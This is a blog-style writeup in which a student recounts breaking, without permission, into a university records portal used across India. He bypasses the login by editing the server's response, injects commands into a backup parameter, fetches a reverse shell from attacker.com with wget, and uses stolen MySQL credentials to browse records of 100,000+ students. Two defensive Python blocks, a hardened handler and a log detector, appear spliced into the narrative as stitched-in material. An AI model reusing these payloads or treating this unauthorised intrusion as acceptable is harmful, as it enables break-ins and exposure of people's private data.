How I Hacked Into a Nationwide University Database System Exposing Thousands of Student Records

1day
7 min read · Sep 22, 2024


INTRODUCTION

Hello friends, I’m a 3rd-year BCA student and part-time bug hunter who is very passionate about cybersecurity (mainly web). Here is a quick article on how I was able to hack into the server of a large university solutions portal which has many university clients and thousands of students’ data.

THE DISCOVERY

One day, when I asked my teacher about my attendance score from her register book, she refused and said, “No, just check your student portal.” Without asking anything further I went to my room, opened my laptop and logged into the portal. While checking the attendance, something came to my mind: “What if I hacked this?” The teacher’s refusal and my attendance score (I was in shortage) brought out the hacker mindset inside me. My only goal was to hack into this server, nothing less. And I started testing it…

TARGET

This is a website used by many universities/colleges across India to manage student records, marksheets, attendance, answer booklets and more. Only students and teachers can log in to the website, as a valid college registration number is required to register.

This server also has a mobile application which uses the same backend.

RECON

So, as usual, I started the recon process by finding almost every subdomain and sub-subdomain of the target using tools like Subfinder, Assetfinder, amass, crt.sh and ffuf. I stored the target’s domain in a file called “scope” and ran these tools on it. But I could not find any interesting subdomains for that domain.

The portal itself is a subdomain like studentportal.example.com. So I jumped to my next recon stage, directory scanning. My favorite tool for directory scanning is ffuf, a fast, reliable tool made for this purpose. So I ran this command:

ffuf -w /usr/share/wordlists/dirb/big.txt -recursion -u https://studentportal.example.com/ -mc 200,301,302

And left it running for about a minute.

I found an interesting directory called /bkp.

Leaving the scanner running, I quickly visited the /bkp endpoint and found a page. It was a login page for the backup portal, and I was like… Found my first step!!!

The login page of the database backup portal.

So I started trying every possible default credential combination, and none worked. Now starting the attack chain…

PARTIAL AUTH BYPASS

You may be wondering what is “partial” about this auth bypass; I will explain after showing you how I did the bypass first.

I started Burp Suite interception and submitted random credentials. Now I could see a request being sent with the data I entered.

The request and response for login attempt

Real ones can already spot the vulnerability here!!

In the response we can see that it sends us “failure”. This means the login validation largely happens on the client side, which opens the possibility of a response manipulation attack.

So I checked the client-side code and saw that if the login succeeds, the server returns the data to be backed up and redirects the user to a panel that displays the database names returned from the login. As I didn’t know what backups existed on the server, I tried editing “failure” to “success”. The request returned 200 and the client then sent a request directly to /bkp/connect.php (connect.php is used to log in to the MySQL DB in the backend).

AND I SAW I WAS LOGGED INTO THE PANEL!!

But it was partial, meaning the database names displayed were ‘s’, ‘u’, ‘c’, ‘c’, ‘e’, ‘s’, ‘s’, because it treated each letter of the string as a database name.

I was not able to see the names of the databases that could be backed up, but I could use the backup feature if I knew the names of the databases.

REMOTE CODE EXECUTION

In the panel, I saw a button called “Backup”. Its function was to download the selected backup data as a zip file. On clicking the backup button, it sends a POST request to /bkp/backup1.php with the backup DB names in a parameter called “sendarr”.

The request after clicking backup

So I tried fuzzing the sendarr parameter for 10–20 minutes and finally found a big lead.

When I set the value of sendarr to %00 (a null byte), the server crashed with an interesting error response.

The response which shows the backend uses exec()

It was using the exec() function in the backend to process this backup.

The exec() function in PHP is used to run system commands from a PHP script.

If you want to know more about what exec() does, read it here.

I was very thrilled to see this response, as it shows that the server uses exec() for this process. So I immediately injected a payload which sleeps for 20 seconds before the response is sent.

sendarr=|sleep 20

The | (pipe) operator in a Bash/Linux shell connects the standard output of one command to the standard input of the next, so both commands get executed; here it is used simply to chain a second command onto the one the server builds.

So the command in the backend will look like this:

./backup.sh | sleep 20

So besides running backup.sh, the shell also runs the sleep command.

I sent the request and BOOM!! It took 20.6 seconds for the server to respond. And now I had confirmed it’s an RCE vulnerability.

Currently it’s blind. I needed visible proof of it before moving further, so I ran a command and redirected the output into /var/www/html/out.

The web root of the website is /var/www/html, so if I place a file inside the web root containing the output of the command I run, I can see the output by visiting /out. So I injected this payload:

sendarr=|id>/var/www/html/out

This payload executes the “id” command on the server and redirects the output into the out file.

And then I visited /out. And YEAHH!!!

Now that I had code execution, I made a simple Python script to interact with the server like a shell.
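Both bugs in this chain have the same root cause: the server trusts what the client sends (a “success” string, and database names passed straight into exec()). The hardened handler below is an added example of how /bkp/backup1.php should decide, written in Python rather than the portal’s PHP since that code is not shown; the allowlist, the session layout and the backup script path are assumptions.

```python
import re
import subprocess

# Assumed allowlist: the databases this deployment may back up. In a real
# system it would come from the authenticated user's server-side session.
ALLOWED_DBS = {"college_a", "college_b"}
# A database name is a plain identifier; anything else (|, >, NUL, spaces) is rejected.
DB_NAME_RE = re.compile(r"[A-Za-z0-9_]{1,64}")
BACKUP_SCRIPT = "/opt/backup/backup.sh"  # assumed location of the real backup.sh


class BackupRequestError(ValueError):
    """Malformed or unauthorised backup request."""


def parse_sendarr(raw):
    """Split the sendarr value (assumed comma-separated) and validate each name."""
    names = [n.strip() for n in raw.split(",") if n.strip()]
    if not names:
        raise BackupRequestError("no database selected")
    for name in names:
        if not DB_NAME_RE.fullmatch(name):
            raise BackupRequestError("invalid database name: %r" % name)
    return names


def build_backup_argv(session, raw_sendarr, allowed=ALLOWED_DBS):
    # 1. Authorisation comes from server-side state set by connect.php after it
    #    verified the credentials, never from a "success" string echoed by the client.
    if not session.get("authenticated"):
        raise PermissionError("not authenticated")
    names = parse_sendarr(raw_sendarr)
    # 2. Only databases this user is entitled to back up.
    denied = [n for n in names if n not in allowed]
    if denied:
        raise PermissionError("not permitted: %s" % ", ".join(denied))
    # 3. argv list, run without a shell, so metacharacters never reach sh.
    return [BACKUP_SCRIPT, *names]


def handle_backup_request(session, raw_sendarr, allowed=ALLOWED_DBS):
    """Return ('ok', argv) or ('rejected', reason); the caller runs the argv."""
    try:
        return "ok", build_backup_argv(session, raw_sendarr, allowed)
    except (PermissionError, BackupRequestError) as exc:
        return "rejected", str(exc)


def run_backup(argv):
    # shell=False: the names are arguments to backup.sh, not shell syntax.
    return subprocess.run(argv, shell=False, capture_output=True, timeout=600)
```

With this in place the payloads from the writeup (`%00`, `|sleep 20`, `|id>/var/www/html/out`) and the letter-by-letter “success” names are all rejected before any process is started.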

Basic RCE exploit

Now it’s time to PWN the server…

GAINING ACCESS

Now, to get inside the server, I used a reverse shell by PentestMonkey.

I hosted the reverse shell file on my attacker machine and downloaded it onto the target server using the following payload:

sendarr=|wget https://attacker.com/rev.php

This command downloaded the reverse shell into the website’s web root.

Then I started a netcat listener and visited /rev.php.

AND I GOT THE SHELL!!!!

Reverse shell

Now I successfully got inside the server.
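Every step of this chain leaves a trace in the web server log: hits on the /bkp/ panel, a backup1.php request that takes 20 seconds, and then GETs for files (/out, /rev.php) that never existed in the web root. The detector below is an added example that is not from the writeup; it runs three such rules over constructed access-log lines in combined format with an assumed response-time field (milliseconds) appended.

```python
import re

# Combined log format plus a trailing response time in ms (assumed custom field).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<ms>\d+)$'
)
# Paths that legitimately exist in the web root (assumed site map).
KNOWN_PATHS = {"/", "/login.php", "/attendance.php", "/bkp/", "/bkp/connect.php", "/bkp/backup1.php"}
SLOW_MS = 15000  # a backup call this slow suggests an injected sleep

# Constructed sample log modelled on the chain in the writeup (not real data).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2024:10:01:02 +0530] "GET /attendance.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 120',
    '203.0.113.7 - - [22/Sep/2024:10:02:10 +0530] "POST /bkp/connect.php HTTP/1.1" 200 312 "-" "Mozilla/5.0" 95',
    '203.0.113.7 - - [22/Sep/2024:10:03:15 +0530] "POST /bkp/backup1.php HTTP/1.1" 200 88 "-" "Mozilla/5.0" 20600',
    '203.0.113.7 - - [22/Sep/2024:10:04:01 +0530] "POST /bkp/backup1.php HTTP/1.1" 200 88 "-" "Mozilla/5.0" 140',
    '203.0.113.7 - - [22/Sep/2024:10:04:05 +0530] "GET /out HTTP/1.1" 200 54 "-" "Mozilla/5.0" 3',
    '203.0.113.7 - - [22/Sep/2024:10:05:30 +0530] "GET /rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0" 300000',
    '198.51.100.4 - - [22/Sep/2024:10:05:31 +0530] "GET /attendance.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 110',
]


def detect(lines):
    """Return (ip, rule, path) findings for the three indicators of this chain."""
    findings = []
    touched_backup = set()  # clients that have POSTed to the backup endpoint
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        ip, method, path, status, ms = m["ip"], m["method"], m["path"], m["status"], int(m["ms"])
        # Rule 1: any access to the backup panel, which should not be internet-facing.
        if path.startswith("/bkp/"):
            findings.append((ip, "backup-panel-access", path))
        # Rule 2: a backup request that takes far longer than normal (time-based probing).
        if path == "/bkp/backup1.php" and method == "POST":
            touched_backup.add(ip)
            if ms >= SLOW_MS:
                findings.append((ip, "slow-backup-response", path))
        # Rule 3: a successful GET of an unknown path by a client that used the
        # backup endpoint earlier: a new file has appeared in the web root.
        if method == "GET" and status == "200" and path not in KNOWN_PATHS and ip in touched_backup:
            findings.append((ip, "new-webroot-file", path))
    return findings
```

Rule 3 is the one that catches the visible-proof and reverse-shell steps; pairing it with file-integrity monitoring on the web root closes the gap for files that are dropped but never fetched over HTTP.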

I was very happy and nervous at the same time. I had the hacker urge to go through the files to find sensitive information.

I found all the program files on the server, exposing functionality like student data management, the marks card generation program, the program to add student marks into the database, the program to insert attendance data, payment processing and more.

While searching through the files, I got what I wanted… a file called consts.php which contained the MySQL credentials that could be used to log in to the database.

MySQL credentials found in consts.php

No more waiting; I quickly tried to log in to MySQL using the following command:

mysql -h servername.rds.amazonaws.com -u username -p

AND BOOM!! I’m in the database!!!

I found many databases of different universities and colleges.

I found my college in the list, and I tried to find my attendance, admission and marks data, and I was able to find it!

Here are some screenshots of the data I found:

As a responsible ethical hacker, I should not attempt to change/delete/add any data in the database. So I reported this to my college dean, who forwarded it to the I.T. team of this service provider. It took almost 2 weeks for the vulnerability to be fixed.

The database had data of almost 100,000+ college students across the country.

CONCLUSION

Finally I accomplished my mission to hack into the server. It took me 3 days to perform the full exploit chain and reach the database.

This was my quick writeup. Hope you enjoyed it; clap for this writeup if you liked it. Stay tuned for more…
